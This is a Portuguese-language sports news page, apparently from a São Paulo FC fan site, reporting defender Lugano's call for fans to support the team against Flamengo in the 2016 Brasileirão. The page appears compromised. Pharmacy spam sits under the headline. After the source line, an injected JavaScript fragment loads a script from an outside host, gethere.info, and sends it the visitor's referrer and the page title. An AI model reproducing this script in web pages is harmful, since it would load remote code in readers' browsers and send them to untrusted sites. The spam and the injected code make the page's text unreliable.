Noticias

Lugano convoca torcida

pills store

obtain cheaply tablets no rx Buy cheap Viagra online

Em campo, frente a frente, duas equipes em situações diferentes na tabela do Campeonato Brasileiro de 2016 duelarão pela 28ª rodada. Em comum? A briga pelos três pontos, que deixa o jogo com cara de decisão. No próximo final de semana, São Paulo e Flamengo se enfrentarão em busca de um resultado positivo para manterem as suas pretensões vivas na competição: o Tricolor quer subir na tabela, enquanto os flamenguistas disputam a liderança. Por isso, diante de uma das sensações da competição, o zagueiro Lugano faz questão de contar com o apoio da torcida.

Ciente de que a partida será parelha e decidida nos detalhes, o uruguaio convocou o torcedor são-paulino para comparecer em peso ao Morumbi. “A presenta do torcedor é importante. Não apenas no próximo sábado, mas nesta reta final de temporada. Não tem sido um grande ano para nossa equipe, mas temos que fazer o possível para vencer. A torcida tem que apoiar a camisa do clube, porque esta camisa está acima de tudo: momentos bons e ruins. Acima de qualquer jogador que passa pelo clube”, afirmou o defensor, que completou.

“Neste momento decisivo do Brasileiro, temos que tirar forças de todos os lados para reverter qualquer adversidade. Temos que terminar o ano como o São Paulo merece: longe das últimas colocações. Após três jogos consecutivos como visitante, o Tricolor voltará para casa com a missão de se reerguer. Neste período, longe de seus domínios, os comandados de Ricardo Gomes enfrentaram o Atlético-PR, em Curitiba, o Juventude pela Copa do Brasil, em Caxias do Sul, e o Vitória, em Salvador. A última partida do Tricolor no Estádio Cícero Pompeu de Toledo foi no dia 15 de setembro, quando os paulistas bateram o Cruzeiro por 1 a 0.

Em casa, aliás, o São Paulo emendou duas vitórias seguidas – tinha derrotado o Figueirense por 3 a 1 antes dos mineiros – e conseguiu subir na tabela. “Por isso é essencial jogar novamente no Morumbi e contar com o apoio da torcida. Vivemos um momento delicado, mas precisamos somar pontos. Jogar no Morumbi nos dá a oportunidade de fazer um jogo mais convincente para conquistar o resultado que a gente precisa. Temos que vencer para embalar nesta reta final do campeonato e acabar o ano do melhor jeito possível”, opinou o marcador, que está motivado para encarar o vice-líder.


“A motivação é conseguir um resultado positivo, porque precisamos muito. Diante de um vice-líder, tudo que um time deseja é vencer. Precisamos muito de um bom resultado e de uma atuação convincente por nós e pelo clube, porque reagir na tabela é o tudo que queremos. Queremos sair deste momento incômodo”, emendou Lugano, que destacou o período de preparação desta semana. “Infelizmente estamos fora da Copa do Brasil, e obviamente treinamos mais. Tivemos mais tempo, uma semana longa e trabalhamos bastante. Corrigimos detalhes que podem fazer a diferença. Quanto mais treinarmos, maior a chance de conquistar um resultado positivo. Mas, tudo é questão de atitude”, finalizou.

Fonte: SiteOficials.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Noticias

Mais em Noticias

campinho_fhrevp4

Dorival confirma time do São Paulo para enfrentar o Avaí

saopauloadmin18 de agosto de 2017
hernanes

Liderado por Hernanes, São Paulo espera viver um ‘novo campeonato’ no 2º turno

saopauloadmin15 de agosto de 2017
gilberto

Gilberto rejeita rótulo de amuleto e pede São Paulo conservador

saopauloadmin14 de agosto de 2017
pratto

Pratto sobre futuro no São Paulo: “Não sou de sair de clube em seis meses, um ano”

saopauloadmin11 de agosto de 2017
lucas

Garotada ganha espaço com o comandante

saopauloadmin10 de agosto de 2017
elenco

Organização e confiança no São Paulo contra o rebaixamento

saopauloadmin7 de agosto de 2017
junior

Relacionados para Bahia x São Paulo

saopauloadmin5 de agosto de 2017
nem

Wellington Nem não joga mais pelo Tricolor

saopauloadmin2 de agosto de 2017
hernanes

Novo Hernanes estuda engenharia, tem bigode e mais amor pelo São Paulo

saopauloadmin1 de agosto de 2017